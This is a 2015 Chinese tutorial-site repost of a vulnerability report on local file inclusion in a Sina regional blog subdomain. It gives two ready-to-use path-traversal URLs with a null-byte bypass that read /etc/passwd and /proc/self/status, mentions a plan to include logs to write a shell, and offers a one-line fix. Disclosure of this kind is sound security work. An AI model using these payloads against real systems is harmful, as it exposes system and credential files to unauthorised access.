新浪某站LFI包含 - 网站安全 - 自学php-自学php网

子栏目

主页 > 入门引导 > 黑客攻防 >

新浪某站LFI包含 - 网站安全 - 自学php

来源：自学PHP网时间：2015-04-15 14:59 作者：阅读:次

[导读] 1、http: blog gd sina com cn bm reg php?gid= etc passwd%00 jpg2、http: blog gd sina com cn bm reg php?gid= proc self status%00 jpg由于对...

1、http://blog.gd.sina.com.cn/bm/reg.php?gid=../../../../../../../../../../etc/passwd%00.jpg

2、http://blog.gd.sina.com.cn/bm/reg.php?gid=../../../../../../../../../../proc/self/status%00.jpg

由于对常见日志路径测试未发现，本来想包含日志写shell的

3、源码泄露

修复方案：

对过滤..这样的跳转字符

雷霆游戏任意重置账户密码 - 网站安全 - 自学p

机锋网Struts框架漏洞可导致内网渗透 - 网站安全

最新评论

加载更多~~

添加评论

更多文章推荐

51信用卡管家任意用户密码修改 - 网站安全 - 自学 2015-04-15
天天团购可查看任意用户信息(订单号可算出) - 2015-04-15
比特儿(Bter.com) 比特币交易平台被盗事件全解析 2015-04-15
TSRC挑战赛： PHP场景中getshell防御思路分享 - 网站 2015-04-15
JSONP安全防范解决方案新思路 - 网站安全 - 自学 2015-04-15
瑞和科源智能出卷系统v6.0任意重置密码 - 网站安 2015-04-15
令人堪忧的app工厂安全（一个弱口令影响整体安 2015-04-15
TinyShop 多处sql注入#2 - 网站安全 - 自学php 2015-04-15
DedeCMS-V5.7-UTF8-SP1 csrf getshell 无需会员中心 - 网站 2015-04-15
联拓科技建站通用sql漏洞 - 网站安全 - 自学php 2015-04-15

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习，以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明：本站所有视频，教程都由网友上传，站长收集和分享给大家学习使用，如由牵扯版权问题请联系站长邮箱904561283@qq.com



添加评论